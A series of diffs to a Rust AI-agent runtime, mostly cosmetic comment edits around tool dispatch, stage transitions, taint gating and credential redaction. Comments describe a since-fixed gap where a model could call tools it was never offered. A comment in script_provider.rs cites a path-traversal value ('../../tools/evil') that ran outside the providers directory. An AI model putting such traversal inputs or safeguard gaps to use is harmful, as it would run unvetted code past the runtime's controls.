     let hub = InteractionHub::new();
     let asking = open_request(&hub, "a", "q1").await;
 
@@ -6770,7 +6770,7 @@ fn match_choice_exact_and_word_and_fallback() {
 #[test]
 fn match_choice_ignores_stage_names_buried_in_prose() {
     // Regression: a review stage's verbose transition response that mentions
-    // "the implementation" must NOT be routed back to the `implement` edge —
+    // "the implementation" must NOT be routed back to the `implement` edge -
     // "implementation" is not the whole word "implement". With no clear
     // decision and allow_complete, the run ends (the review approved).
     let edges = vec![plain_edge("implement"), plain_edge("error_recovery")];
@@ -7124,7 +7124,7 @@ fn collect_choice_applies_the_chosen_edge_transform() {
 
 #[test]
 fn collect_choice_holds_the_stage_when_the_chosen_edge_is_gated() {
-    // The LLM-choice path enforces the same gate as the linear path — and
+    // The LLM-choice path enforces the same gate as the linear path - and
     // must do so before the edge transform reshapes the context it needs.
     let (mut world, tx) = world_with_transition_results();
     let bp = blueprint(vec![
@@ -7174,7 +7174,7 @@ fn collect_choice_records_a_forced_gate_and_enters_the_stage() {
         // Budget already spent.
         .insert(progress_with(0, 0, 3))
         .insert(crate::persistence::RunOutcomeFlags::default());
-    // An agent with no flags component still transitions — it just has
+    // An agent with no flags component still transitions - it just has
     // nowhere to record the forced gate.
     let unflagged = spawn_responding_agent(&mut world, bp, vec![si("m0"), si("m1")], vec![edge]);
     world.entity_mut(unflagged).insert(progress_with(0, 0, 3));

--- a/crates/leviath-runtime/src/pipeline/tests.rs
+++ b/crates/leviath-runtime/src/pipeline/tests.rs
@@ -1467,7 +1467,7 @@ fn process_response_bumps_tool_calls_in_token_totals() {
 }
 
 /// Per-path churn is counted from the REQUESTED calls, which is what feeds
-/// the `stuck_after_same_file_edits` threshold (#106).
+/// the `stuck_after_same_file_edits` threshold.
 #[test]
 fn process_response_counts_edits_by_path() {
     let call = |name: &str, path: Option<&str>| crate::components::ToolCall {

--- a/crates/leviath-runtime/src/pipeline/tool_results.rs
+++ b/crates/leviath-runtime/src/pipeline/tool_results.rs
@@ -63,7 +63,7 @@ pub(crate) fn apply_tool_results(
         let base_region = match routing {
             Some(r) => {
                 // Match overrides by CANONICAL tool name so a `bash = "..."` override
-                // routes the `shell` tool (bash is an alias — the model calls the
+                // routes the `shell` tool (bash is an alias - the model calls the
                 // canonical `shell`, so a literal-key lookup would silently miss).
                 let canon = leviath_tools::canonical_tool_name(&tool_name);
                 r.tool_overrides
@@ -106,7 +106,7 @@ pub(crate) fn apply_tool_results(
                     let omitted = content.len().saturating_sub(prefix.len());
                     format!("{}... [truncated, {} chars omitted]", prefix, omitted)
                 } else {
-                    "[tool result truncated — context window full]".to_string()
+                    "[tool result truncated - context window full]".to_string()
                 };
                 let trunc_tokens = leviath_core::estimate_tokens(&truncated);
                 if put(window, truncated, trunc_tokens).is_err() {
@@ -135,7 +135,7 @@ pub(crate) fn apply_tool_results(
             // in the message immediately after its tool_use, so the PAIR must stay in
             // `conversation`: we keep a short pointer tool_result there (valid + cheap)
             // and store the FULL output in the target region as TEXT. Text renders as a
-            // stable knowledge block for any region kind — a ToolResult block in a
+            // stable knowledge block for any region kind - a ToolResult block in a
             // second sliding_window would desync from its tool_use (→ API 400), and
             // dropping the conversation tool_result would orphan the tool_use (the
             // assembler strips it, so the model can't see its own call landed → loops).
@@ -146,7 +146,7 @@ pub(crate) fn apply_tool_results(
                 ""
             };
             let pointer = format!(
-                "[output stored in context region '{target_region}' ({result_tokens} tokens) — read that region for the full result. Preview: {preview}{ellipsis}]"
+                "[output stored in context region '{target_region}' ({result_tokens} tokens) - read that region for the full result. Preview: {preview}{ellipsis}]"
             );
             let pointer_tokens = leviath_core::estimate_tokens(&pointer);
             add_kind(
@@ -187,7 +187,7 @@ pub(crate) fn truncate_file(content: String, max_tokens: Option<usize>) -> Strin
 /// File tracking: for each `read_file`/`write_file` result (per the stage's
 /// [`FileTrackingConfig`](leviath_core::blueprint::FileTrackingConfig)), upsert
 /// the file body into the configured HashMap region (keyed by path, so re-reads
-/// de-dup) and replace the inline tool result with a short reference — keeping
+/// de-dup) and replace the inline tool result with a short reference - keeping
 /// large file bodies out of the rolling conversation. No-op unless the region
 /// exists and is a HashMap. `read_file`'s body is the result; `write_file`'s is
 /// its `content` argument (no re-read needed in the ECS).
@@ -270,7 +270,7 @@ pub(crate) fn stage_modifying_tools(
 
 /// Tally this batch's file-modifying tool calls onto the stage's progress and the
 /// run's outcome flags. A result prefixed `[denied]` (permission layer) counts as
-/// *blocked* rather than successful — the agent tried and was refused, which a
+/// *blocked* rather than successful - the agent tried and was refused, which a
 /// gate treats differently from never having tried. `[error]` results (the write
 /// itself failed) count as neither.
 pub(crate) fn record_modifications(

--- a/crates/leviath-runtime/src/pipeline/tools.rs
+++ b/crates/leviath-runtime/src/pipeline/tools.rs
@@ -8,7 +8,7 @@ use super::*;
 pub struct AwaitingTools;
 
 /// Marker: this agent's advertised tools should be re-resolved before its next
-/// turn — mid-run dynamic tool discovery (issue #97). Consumed by
+/// turn - mid-run dynamic tool discovery (issue #97). Consumed by
 /// [`refresh_advertised_tools`], which asks the [`ToolService`] for the stage's
 /// fresh tool defs and writes them into the live [`StageInference`].
 #[derive(Component, Debug, Clone, Copy)]
@@ -34,8 +34,8 @@ pub trait ToolService: Send + Sync {
     /// Default no-op for services without per-stage policy.
     fn sync_stage(&self, _entity: Entity, _stage_index: usize, _stage_name: &str) {}
 
-    /// Re-resolve `entity`'s advertised tool defs for the stage at `stage_index`
-    /// — e.g. after new tools were discovered on disk. `None` means "no change"
+    /// Re-resolve `entity`'s advertised tool defs for the stage at `stage_index` -
+    /// e.g. after new tools were discovered on disk. `None` means "no change"
     /// (the default, for services without dynamic tools); `Some(tools)` replaces
     /// the stage's advertised set.
     fn refresh_tools(
@@ -107,7 +107,7 @@ pub(crate) fn merge_in_call_order(
 /// anything reasoning about what the agent *did*: file tracking must not record
 /// a write that was not written, and the modification counters behind a
 /// transition gate must not count it as work. Three separate prefix lists is
-/// exactly how a fourth prefix gets missed — `[unavailable]` was, when dispatch
+/// exactly how a fourth prefix gets missed - `[unavailable]` was, when dispatch
 /// began refusing unoffered tools and both call sites still listed only two.
 pub(crate) fn call_had_no_effect(result: &str) -> bool {
     result.starts_with("[error]")
@@ -161,7 +161,7 @@ pub(crate) fn unoffered_tool_refusal(stage: &StageInference, name: &str) -> Opti
 /// sequential tool lane, moving it to `AwaitingTools`. If a batch is *all*
 /// context tools there is nothing for the lane, so the results are applied
 /// immediately and the agent loops straight back to `ReadyToInfer`. The lane
-/// serializes execution, so there is no permit gate — every ready agent is
+/// serializes execution, so there is no permit gate - every ready agent is
 /// enqueued in turn.
 #[allow(clippy::type_complexity, clippy::too_many_arguments)]
 pub fn dispatch_tools(
@@ -216,12 +216,12 @@ pub fn dispatch_tools(
         // on a gate prompt no one can answer (taint tracking still records).
         let auto_approve_gates = auto_gate.is_some();
         if state.status != AgentStatus::Active {
-            continue; // paused / waiting / cancelled — don't start new work
+            continue; // paused / waiting / cancelled - don't start new work
         }
 
         // Apply context_* tools inline (they need world access); collect the rest
         // for the async lane. A taint-gated agent's outbound call that would leak
-        // over-cleared data (and isn't allowlisted) is blocked — either returned
+        // over-cleared data (and isn't allowlisted) is blocked - either returned
         // as `[blocked]`, or (interactive) held for a user gate prompt.
         let mut context_results = Vec::new();
         let mut lane_calls = Vec::new();
@@ -238,7 +238,7 @@ pub fn dispatch_tools(
             // A stage's `available_tools` was applied only when building the
             // schema list sent to the model. Nothing checked it again here, so a
             // model that *named* a tool it had never been offered got that call
-            // dispatched anyway — reaching the permission gate, and for a
+            // dispatched anyway - reaching the permission gate, and for a
             // default-`Ask` tool surfacing to the user as an approval prompt for
             // something the stage was never granted.
             //
@@ -249,8 +249,8 @@ pub fn dispatch_tools(
             // it was the only thing that stopped it.
             //
             // Checked against `StageInference`, which *is* the set advertised
-            // for this stage — resolved at spawn, swapped on every transition,
-            // and rewritten by the dynamic-tools refresh — so enforcement cannot
+            // for this stage - resolved at spawn, swapped on every transition,
+            // and rewritten by the dynamic-tools refresh - so enforcement cannot
             // drift from advertising the way a second copy of the rule would.
             if let Some(refusal) = unoffered_tool_refusal(stage_inf, &c.name) {
                 context_results.push((c.tool_id.clone(), refusal));
@@ -360,7 +360,7 @@ pub fn dispatch_tools(
             .remove::<crate::gate_prompt::GateResolved>();
 
         if lane_calls.is_empty() {
-            // Nothing async to run — apply the context results now and loop back.
+            // Nothing async to run - apply the context results now and loop back.
             let merged = merge_in_call_order(&result.tool_calls, &context_results);
             apply_tool_results(
                 &mut window,

--- a/crates/leviath-runtime/src/pipeline/tools.rs
+++ b/crates/leviath-runtime/src/pipeline/tools.rs
@@ -8,13 +8,13 @@ use super::*;
 pub struct AwaitingTools;
 
 /// Marker: this agent's advertised tools should be re-resolved before its next
-/// turn - mid-run dynamic tool discovery (issue #97). Consumed by
+/// turn - mid-run dynamic tool discovery. Consumed by
 /// [`refresh_advertised_tools`], which asks the [`ToolService`] for the stage's
 /// fresh tool defs and writes them into the live [`StageInference`].
 #[derive(Component, Debug, Clone, Copy)]
 pub struct ToolsNeedRefresh;
 
-/// Marker: this agent opted into `dynamic_tools` (issue #97). Only such agents
+/// Marker: this agent opted into `dynamic_tools`. Only such agents
 /// are polled by [`poll_dynamic_tool_refresh`] for a pending tool re-scan, so the
 /// default (static) agent pays nothing.
 #[derive(Component, Debug, Clone, Copy)]

--- a/crates/leviath-runtime/src/pipeline/transition.rs
+++ b/crates/leviath-runtime/src/pipeline/transition.rs
@@ -58,9 +58,9 @@ pub struct AwaitingTransitionChoice(pub Vec<leviath_core::blueprint::TransitionE
 
 /// The outcome of synchronously resolving a completed stage's transition.
 pub(crate) enum StageResolution {
-    /// No valid outgoing transition — the agent is done.
+    /// No valid outgoing transition - the agent is done.
     Terminal,
-    /// The stage errored and has no `error` edge — terminate the run as errored,
+    /// The stage errored and has no `error` edge - terminate the run as errored,
     /// preserving the error status the collect system already set.
     TerminalError,
     /// Advance to this stage index, applying the edge's context transform once
@@ -70,9 +70,9 @@ pub(crate) enum StageResolution {
         leviath_core::blueprint::EdgeTransform,
         Option<leviath_core::blueprint::TransitionGate>,
     ),
-    /// Multiple candidate edges — an LLM must choose among them.
+    /// Multiple candidate edges - an LLM must choose among them.
     Choose(Vec<leviath_core::blueprint::TransitionEdge>),
-    /// Not a transition after all — put the agent back to work in its current
+    /// Not a transition after all - put the agent back to work in its current
     /// stage. Only a stuck interrupt produces this: it fires mid-stage, so when
     /// its escape edge is no longer available the stage must simply continue
     /// (falling through would end a stage the agent never said it had finished).
@@ -105,7 +105,7 @@ pub(crate) fn find_conditioned_edge_ref<'a>(
 }
 
 /// As [`find_conditioned_edge_ref`], projected to the target index and a cloned
-/// edge transform — what the transition systems need.
+/// edge transform - what the transition systems need.
 pub(crate) fn find_conditioned_edge(
     blueprint: &leviath_core::Blueprint,
     stage: &leviath_core::Stage,
@@ -125,8 +125,8 @@ pub const WORKSPACE_CHECK_INTERVAL: usize = 5;
 ///
 /// Issue #107: an external harness deleted the workspace out from under running
 /// agents, which then spent every remaining iteration collecting
-/// `No such file or directory` from their tools — 16-17 of them in the observed
-/// runs — with no way back. Nothing can recreate a deleted checkout from inside
+/// `No such file or directory` from their tools - 16-17 of them in the observed
+/// runs - with no way back. Nothing can recreate a deleted checkout from inside
 /// the agent, so this stops immediately with a message that names the real
 /// problem, instead of routing to error recovery to flail more cheaply.
 #[allow(clippy::type_complexity)]
@@ -244,7 +244,7 @@ pub(crate) fn detect_stuck(
     {
         return Some(format!(
             "you have written or edited '{path}' {hits} times in this stage without \
-             resolving the task — the problem is very likely not in that file"
+             resolving the task - the problem is very likely not in that file"
         ));
     }
     if let Some(limit) = cfg.after_iterations
@@ -288,7 +288,7 @@ pub(crate) fn hottest_edit(
 /// Write the "why you're stuck" note where the next stage will read it: the
 /// blueprint's `stuck_report` region when it declares one, else `conversation`
 /// (which every blueprint is required to declare). Best-effort, like the
-/// repetition nudge — an overflowing region silently drops the note.
+/// repetition nudge - an overflowing region silently drops the note.
 pub(crate) fn note_stuck(window: &mut ContextWindow, stage: &str, reason: &str) {
     let region = if window.get_region(STUCK_REPORT_REGION).is_some() {
         STUCK_REPORT_REGION
@@ -298,7 +298,7 @@ pub(crate) fn note_stuck(window: &mut ContextWindow, stage: &str, reason: &str) 
     let content = format!(
         "[Stuck detected in stage '{stage}'] {reason}. Stop repeating what you have been \
          doing. Re-read the original task, separate what you have actually verified from \
-         what you assumed, and take a different approach — including reverting changes \
+         what you assumed, and take a different approach - including reverting changes \
          that made things worse."
     );
     let tokens = leviath_core::estimate_tokens(&content);
@@ -313,7 +313,7 @@ pub(crate) fn note_stuck(window: &mut ContextWindow, stage: &str, reason: &str) 
 ///
 /// Fires at most once per stage entry (`StageProgress::stuck_fired`, cleared by
 /// `enter_stage`'s progress reset), and never once the stuck edge's target has
-/// spent its `max_revisits` — an exhausted escape hatch must leave the agent
+/// spent its `max_revisits` - an exhausted escape hatch must leave the agent
 /// working the stage normally (its `max_iterations` is still the hard cap) rather
 /// than kick it out down an unrelated edge.
 #[allow(clippy::type_complexity)]
@@ -467,7 +467,7 @@ pub fn is_terminal_status(status: &AgentStatus) -> bool {
 /// `requires_children` gate (exclusive, mirrors the fan-out wait): a stage marked
 /// `requires_children` may not transition while any of the agent's spawned
 /// sub-agents ([`SubAgentChildren`](crate::components::SubAgentChildren)) are
-/// still running — the parent is held `Waiting` (`WaitingForChildren`) and
+/// still running - the parent is held `Waiting` (`WaitingForChildren`) and
 /// resumes (re-inserting `ResolveTransition`, back to `Active`) once every child
 /// is terminal.
 pub fn gate_requires_children(world: &mut World) {
@@ -577,7 +577,7 @@ pub(crate) fn unmet_required_regions(
         .iter()
         .filter(|r| r.required)
         // Caller-input regions are validated (and seeded) at spawn, not written
-        // by the agent — skip them here so this gate never nags the agent to
+        // by the agent - skip them here so this gate never nags the agent to
         // populate a slot the caller owns.
         .filter(|r| {
             !matches!(
@@ -616,7 +616,7 @@ pub(crate) fn inject_required_region_nudges(
 
 /// Required-region gate: before a normally-completed stage transitions, if it can
 /// write context and a `required` region is still empty, inject a nudge and re-run
-/// the stage (loop back to `ReadyToInfer`) instead of transitioning — bounded by
+/// the stage (loop back to `ReadyToInfer`) instead of transitioning - bounded by
 /// the stage's `max_revisits` (or a default cap), after which
 /// it proceeds with a warning. Skipped when the stage ended on an error / max-iter
 /// outcome (those transitions take precedence). Ported from the imperative gate.
@@ -670,9 +670,9 @@ pub fn require_context_regions(
 /// What a chosen edge's gate says about the transition.
 #[derive(Debug, Clone, PartialEq, Eq)]
 pub(crate) enum GateDecision {
-    /// The gate is satisfied (or absent) — follow the edge.
+    /// The gate is satisfied (or absent) - follow the edge.
     Pass,
-    /// The gate is unsatisfied but out of re-run budget — follow the edge and
+    /// The gate is unsatisfied but out of re-run budget - follow the edge and
     /// record it in the run's flags so the run explains itself afterwards.
     Forced,
     /// Hold the agent in this stage and show it this nudge.
@@ -759,7 +759,7 @@ pub(crate) fn gate_blocks(
 
 /// Hold an agent in its current stage after a gate refused the transition: inject
 /// the nudge, count the re-entry, and put it back in front of the model. The
-/// stage is *not* re-entered — `StageProgress` is deliberately preserved so the
+/// stage is *not* re-entered - `StageProgress` is deliberately preserved so the
 /// stage's `max_iterations` still bounds the loop.
 pub(crate) fn hold_for_gate(
     entity: Entity,
@@ -844,7 +844,7 @@ pub fn resolve_transition(
             Some(StageOutcome::Stuck(_)) => {
                 // A stuck interrupt is mid-stage, not a stage end. If the escape
                 // hatch went away between detection and here (its target spent
-                // its last revisit), resume — falling through to
+                // its last revisit), resume - falling through to
                 // `resolve_transition_sync` would end a stage the agent never
                 // said it had finished, e.g. shunting `implement` into `review`
                 // with the work half-done.
@@ -945,11 +945,11 @@ pub fn resolve_transition(
 
 /// Enter the stage at `idx`: update the cursor + current-stage name, reset
 /// per-stage progress, bump the visit count, set `accepts_messages`, and apply the
-/// stage's context setup — swap to its layout (if any) and (re)inject its system
+/// stage's context setup - swap to its layout (if any) and (re)inject its system
 /// prompt as pinned `[Stage instructions: …]` context, replacing the previous
 /// stage's. (Ported from the imperative loop's per-stage setup.)
 ///
-/// Returns `Err` only when the system prompt doesn't fit its region — the same
+/// Returns `Err` only when the system prompt doesn't fit its region - the same
 /// hard failure the imperative loop raises; the caller marks the agent `Error`.
 #[allow(clippy::too_many_arguments)]
 pub(crate) fn enter_stage(
@@ -986,7 +986,7 @@ pub(crate) fn apply_stage_context(
     }
 
     // Inject stage instructions into the first pinned region (cacheable), or the
-    // conversation region if there is none — clearing any prior stage's first.
+    // conversation region if there is none - clearing any prior stage's first.
     let target = window
         .regions
         .iter()
@@ -1046,7 +1046,7 @@ pub(crate) fn attach_stage_components(
     }
 }
 
-/// Force an agent into the stage at `target_idx` via direct world access — the
+/// Force an agent into the stage at `target_idx` via direct world access - the
 /// same effect as [`resolve_transition`]'s linear-`Next` arm, but callable from
 /// an exclusive system (e.g. the fan-out collector jumping to its `merge_stage`)
 /// or the daemon (spawning a fan-out worker directly at its worker stage) where no
@@ -1054,7 +1054,7 @@ pub(crate) fn attach_stage_components(
 /// marked `Error`, mirroring the transition systems.
 pub fn force_transition(world: &mut World, entity: Entity, target_idx: usize) {
     // Phase 1 (scoped borrow): mutate the agent's own state via `enter_stage`,
-    // returning the components Phase 2 must insert — or `None` if the agent is
+    // returning the components Phase 2 must insert - or `None` if the agent is
     // gone or its system prompt overflowed (already marked `Error` in-place).
     let attach: Option<(StageInference, StageSetup, String)> = {
         let mut q = world.query::<(
@@ -1127,7 +1127,7 @@ pub fn force_transition(world: &mut World, entity: Entity, target_idx: usize) {
 }
 
 /// A blueprint stage resolved to a concrete provider, model, and effective tool
-/// set — the per-stage input to [`spawn_agent`]. The caller (CLI / daemon) owns
+/// set - the per-stage input to [`spawn_agent`]. The caller (CLI / daemon) owns
 /// the model-selection policy (overrides, availability, user defaults) and tool
 /// filtering; the runtime just turns the result into agent data.
 pub struct ResolvedStage {
@@ -1147,7 +1147,7 @@ pub(crate) const DEFAULT_CONTEXT_WINDOW_TOKENS: usize = 8192;
 /// Look up a model's context window (for resolving percentage region budgets)
 /// via the registered [`Providers`]. Falls back to
 /// [`DEFAULT_CONTEXT_WINDOW_TOKENS`] with a warning when the provider isn't
-/// registered — non-fatal, and `min_tokens` floors still protect regions.
+/// registered - non-fatal, and `min_tokens` floors still protect regions.
 pub(crate) fn context_window_tokens(world: &World, provider_name: &str, model: &str) -> usize {
     match world
         .get_resource::<Providers>()
@@ -1280,7 +1280,7 @@ pub fn spawn_agent_seeded(
     global_batch_tool_hint: bool,
 ) -> Result<Entity, String> {
     // Resolve any percentage region budgets against each stage's model context
-    // window (the only place the model — and hence the window — is known). The
+    // window (the only place the model - and hence the window - is known). The
     // global layout resolves against the entry stage (stage 0); each per-stage
     // layout resolves against that stage's own model. Absolute layouts resolve to
     // themselves, so this is a no-op for legacy blueprints.
@@ -1461,8 +1461,8 @@ pub(crate) fn build_transition_prompt(
 ///
 /// Models are asked to answer with only the target stage name (or `DONE`), but
 /// frequently wrap it in prose or re-explain the stage. We therefore look for a
-/// clean, standalone decision — scanning the first line, then the concluding
-/// line, for a **whole-word** match against a stage name or `DONE` — instead of
+/// clean, standalone decision - scanning the first line, then the concluding
+/// line, for a **whole-word** match against a stage name or `DONE` - instead of
 /// substring-scanning the whole response, where a stage name mentioned in
 /// passing ("the implementation", "the approved plan") would hijack the routing.
 /// When nothing matches, a stage that may complete ends the run; otherwise the
@@ -1478,8 +1478,8 @@ pub(crate) fn match_transition_choice(
         .filter(|l| !l.is_empty())
         .collect();
     // Candidate decision lines, in priority order: the first line (the model was
-    // told to reply with only the name, so the answer leads), then — only if it
-    // is short and answer-like (≤ 3 words) — the concluding line, which catches
+    // told to reply with only the name, so the answer leads), then - only if it
+    // is short and answer-like (≤ 3 words) - the concluding line, which catches
     // models that reason first and answer last without matching a stage name
     // buried in a prose summary ("the approved plan was implemented").
     let words_in = |line: &str| {
@@ -1543,13 +1543,13 @@ pub fn dispatch_transition_choice(
     for (entity, state, mut window, si, bp, cursor, choice, in_flight) in agents.iter_mut() {
         crate::tick_scope::enter(entity);
         if state.status != AgentStatus::Active {
-            continue; // paused / waiting / cancelled — don't start new work
+            continue; // paused / waiting / cancelled - don't start new work
         }
         let Some(provider) = providers.0.get(&si.provider_name) else {
-            continue; // provider not registered — retry later
+            continue; // provider not registered - retry later
         };
         let Some(permit) = stage.pools.try_acquire(&si.model) else {
-            continue; // pool full — retry next tick
+            continue; // pool full - retry next tick
         };
 
         let current = &bp.0.stages[cursor.index];
@@ -1680,7 +1680,7 @@ pub fn collect_transition_choice(
                         .position(|s| s.name == target)
                         .unwrap_or(0);
                 // The chosen edge (absent when the matched target has no explicit
-                // edge, e.g. a fallback — then Direct, ungated).
+                // edge, e.g. a fallback - then Direct, ungated).
                 let edge = resp.0.iter().find(|e| e.target == target);
                 let transform = edge.map(|e| e.transform.clone()).unwrap_or_default();
                 // The edge's gate is checked BEFORE its transform runs, so a

--- a/crates/leviath-runtime/src/pipeline/transition.rs
+++ b/crates/leviath-runtime/src/pipeline/transition.rs
@@ -123,8 +123,8 @@ pub const WORKSPACE_CHECK_INTERVAL: usize = 5;
 
 /// Workspace health guard: fail a run whose working directory has disappeared.
 ///
-/// Issue #107: an external harness deleted the workspace out from under running
-/// agents, which then spent every remaining iteration collecting
+/// The motivating failure: an external harness deleted the workspace out from
+/// under running agents, which then spent every remaining iteration collecting
 /// `No such file or directory` from their tools - 16-17 of them in the observed
 /// runs - with no way back. Nothing can recreate a deleted checkout from inside
 /// the agent, so this stops immediately with a message that names the real
@@ -682,8 +682,9 @@ pub(crate) enum GateDecision {
 /// Decide whether a chosen edge's [gate](leviath_core::blueprint::TransitionGate)
 /// blocks the transition.
 ///
-/// Issue #107: an agent can read and reason about a codebase entirely through
-/// `shell` and arrive at the review stage having changed nothing, producing a run
+/// The failure this guards against: an agent can read and reason about a
+/// codebase entirely through `shell` and arrive at the review stage having
+/// changed nothing, producing a run
 /// with no output. A `require_modifications` gate keeps it in the stage until it
 /// has actually written something.
 ///
@@ -1773,7 +1774,7 @@ pub fn sync_tool_stages(
 /// inference request advertises, read fresh by `build_request`) and the matching
 /// [`StageInferences`] catalog entry (so a later revisit of this stage keeps the
 /// updated set). Always consumes the marker. This is the mechanism behind
-/// mid-run dynamic tool discovery and lazily-listed MCP tools (issue #97).
+/// mid-run dynamic tool discovery and lazily-listed MCP tools.
 pub fn refresh_advertised_tools(
     service: Res<ToolServiceRes>,
     mut agents: Query<

--- a/crates/leviath-runtime/src/provider_creds.rs
+++ b/crates/leviath-runtime/src/provider_creds.rs
@@ -309,9 +309,9 @@ mod tests {
 
     #[test]
     fn claude_code_reads_its_binary_and_effort_options() {
-        // The registry arm used to discard both, always constructing a default
-        // provider, so a configured binary path or effort level was silently
-        // ignored.
+        // The registry arm must thread both options through: constructing a
+        // default provider here would silently ignore a configured binary path
+        // or effort level.
         let mut creds = ProviderCreds::simple("claude-code");
         creds
             .options

--- a/crates/leviath-runtime/src/provider_creds.rs
+++ b/crates/leviath-runtime/src/provider_creds.rs
@@ -42,8 +42,8 @@ pub struct ProviderCreds {
 
 /// Hand-written so the API key can never reach a log line.
 ///
-/// A `#[derive(Debug)]` here meant a single `tracing::debug!(?creds)` — or an
-/// error context that formats a struct holding one — would print the key.
+/// A `#[derive(Debug)]` here meant a single `tracing::debug!(?creds)` - or an
+/// error context that formats a struct holding one - would print the key.
 /// Nothing did, which is when it is cheap to make impossible.
 impl std::fmt::Debug for ProviderCreds {
     fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
@@ -181,8 +181,8 @@ pub fn build_provider_registry(creds: &[ProviderCreds]) -> ProviderRegistry {
 mod tests {
     use super::*;
 
-    /// One `tracing::debug!(?creds)` — or an error context that formats a struct
-    /// holding one — would otherwise print the provider key.
+    /// One `tracing::debug!(?creds)` - or an error context that formats a struct
+    /// holding one - would otherwise print the provider key.
     #[test]
     fn debug_output_never_contains_the_api_key() {
         let mut creds = ProviderCreds::simple("anthropic");

--- a/crates/leviath-runtime/src/providers.rs
+++ b/crates/leviath-runtime/src/providers.rs
@@ -10,7 +10,7 @@ use std::sync::Arc;
 ///
 /// The pipeline resolves each agent's stage `ModelConfig` to a concrete
 /// provider through this registry. Native providers are registered eagerly;
-/// script providers (issue #101) are resolved lazily — and hot-reloaded — via
+/// script providers (issue #101) are resolved lazily - and hot-reloaded - via
 /// an optional [`ScriptProviderLayer`].
 #[derive(Clone, Default)]
 pub struct ProviderRegistry {

--- a/crates/leviath-runtime/src/providers.rs
+++ b/crates/leviath-runtime/src/providers.rs
@@ -10,7 +10,7 @@ use std::sync::Arc;
 ///
 /// The pipeline resolves each agent's stage `ModelConfig` to a concrete
 /// provider through this registry. Native providers are registered eagerly;
-/// script providers (issue #101) are resolved lazily - and hot-reloaded - via
+/// script providers are resolved lazily - and hot-reloaded - via
 /// an optional [`ScriptProviderLayer`].
 #[derive(Clone, Default)]
 pub struct ProviderRegistry {

--- a/crates/leviath-runtime/src/repetition.rs
+++ b/crates/leviath-runtime/src/repetition.rs
@@ -140,7 +140,7 @@ impl RepetitionDetector {
             let count_val = *count;
             return Some(format!(
                 "You have called {tool_name} with the same arguments {count_val} times. \
-                 This appears to be a loop. Take a different action — try writing code \
+                 This appears to be a loop. Take a different action - try writing code \
                  with write_file, editing with edit_file, running commands with bash, \
                  or storing analysis with context_write."
             ));
@@ -152,7 +152,7 @@ impl RepetitionDetector {
             return Some(format!(
                 "You have made {streak} consecutive read-only tool calls \
                  (read_file/list_dir) without any writes or command execution. \
-                 Break this pattern — write a file, edit code, run a command, \
+                 Break this pattern - write a file, edit code, run a command, \
                  or use context_write to store your analysis."
             ));
         }
@@ -231,7 +231,7 @@ mod tests {
                 .is_none()
         );
 
-        // Read again — counter should be back to 1
+        // Read again - counter should be back to 1
         assert!(
             detector
                 .record_call("read_file", r#"{"path":"foo.py"}"#)
@@ -289,7 +289,7 @@ mod tests {
                 .record_call("read_file", r#"{"path":"c.rs"}"#)
                 .is_none()
         );
-        // No nudge — all different args
+        // No nudge - all different args
     }
 
     #[test]
@@ -366,7 +366,7 @@ mod tests {
 
         detector.record_call("read_file", r#"{"path":"a.rs"}"#);
         detector.record_call("read_file", r#"{"path":"b.rs"}"#);
-        // Unknown tool: not readonly, not productive — doesn't increment or reset streak
+        // Unknown tool: not readonly, not productive - doesn't increment or reset streak
         detector.record_call("some_other_tool", r#"{}"#);
         // Streak is still 2
         assert!(

--- a/crates/leviath-runtime/src/restore.rs
+++ b/crates/leviath-runtime/src/restore.rs
@@ -5,7 +5,7 @@
 //! and spawns a fresh agent, then calls [`restore_agent`] to overlay the persisted
 //! context, jump to the persisted stage + iteration, and restore token totals. The
 //! agent keeps the `ReadyToInfer` marker `spawn_agent` set, so **any inference
-//! that was in flight when the daemon stopped is re-issued** on the next tick —
+//! that was in flight when the daemon stopped is re-issued** on the next tick -
 //! nothing is left stuck awaiting a job that died with the old process.
 
 use bevy_ecs::prelude::*;
@@ -33,7 +33,7 @@ pub enum RestorePriority {
 /// Classify one persisted run for restart recovery from its on-disk status and
 /// whether it is parked mid fan-out (a `<run_dir>/fanout.json` is present).
 ///
-/// Returns `None` for a **terminal** run (`Complete` / `Error` / `Cancelled`) —
+/// Returns `None` for a **terminal** run (`Complete` / `Error` / `Cancelled`) -
 /// those are never resumed. A run parked on a fan-out is [`Blocked`] regardless of
 /// its status: it can't progress until its children finish.
 ///
@@ -118,7 +118,7 @@ pub fn restore_agent(
                     .collect();
                 // Rebuild the taint alongside the content. Assigning `content`
                 // directly bypasses `add_tainted_entry`, which is the only thing
-                // that records per-entry taint — so without this the region came
+                // that records per-entry taint - so without this the region came
                 // back `Public` no matter how sensitive it had been, while the
                 // gate reported itself armed.
                 // Only where the region already tracks taint: restoring it onto
@@ -266,7 +266,7 @@ mod tests {
                         },
                     ],
                 },
-                // A region that no longer exists in the window — skipped.
+                // A region that no longer exists in the window - skipped.
                 RegionSnapshot {
                     name: "ghost".to_string(),
                     kind: "pinned".to_string(),
@@ -286,7 +286,7 @@ mod tests {
     }
 
     /// Taint was not persisted at all, so a restart, resume or page-in brought
-    /// every region back `Public` no matter how sensitive it had been — while
+    /// every region back `Public` no matter how sensitive it had been - while
     /// the gate went on reporting itself armed. It is rebuilt from the entries,
     /// and only where the region already tracks taint: restoring a level onto a
     /// region with tracking off would invent one nothing reads.

--- a/crates/leviath-runtime/src/script_provider.rs
+++ b/crates/leviath-runtime/src/script_provider.rs
@@ -24,7 +24,7 @@ use std::time::SystemTime;
 use leviath_providers::{ModelCapabilities, Provider, RateLimitConfig, RhaiProvider};
 
 /// Per-provider configuration from `[model_providers.<name>]`. All fields are
-/// optional overrides — a script activates by an agent referencing its name and
+/// optional overrides - a script activates by an agent referencing its name and
 /// the file existing, not by having an entry here.
 #[derive(Clone, Debug, Default)]
 pub struct ScriptProviderSpec {
@@ -50,7 +50,7 @@ pub struct ScriptProviderLayer {
     default_caps: HashMap<String, ModelCapabilities>,
     request_timeout_secs: Option<u64>,
     /// `[security] allow_env_vars`: credential-shaped environment variables a
-    /// provider script may read. Empty by default — a provider script runs
+    /// provider script may read. Empty by default - a provider script runs
     /// during inference, not through a tool call, so nothing it does passes an
     /// approval prompt.
     env_allowlist: Arc<Vec<String>>,
@@ -82,7 +82,7 @@ impl ScriptProviderLayer {
     /// `<name>.rhai` in the providers dir.
     ///
     /// A *relative* override is confined to the providers directory. It used to
-    /// be joined verbatim, so `script = "../../tools/evil"` reached outside it —
+    /// be joined verbatim, so `script = "../../tools/evil"` reached outside it -
     /// and whatever it reached is compiled and run as a provider, which is the
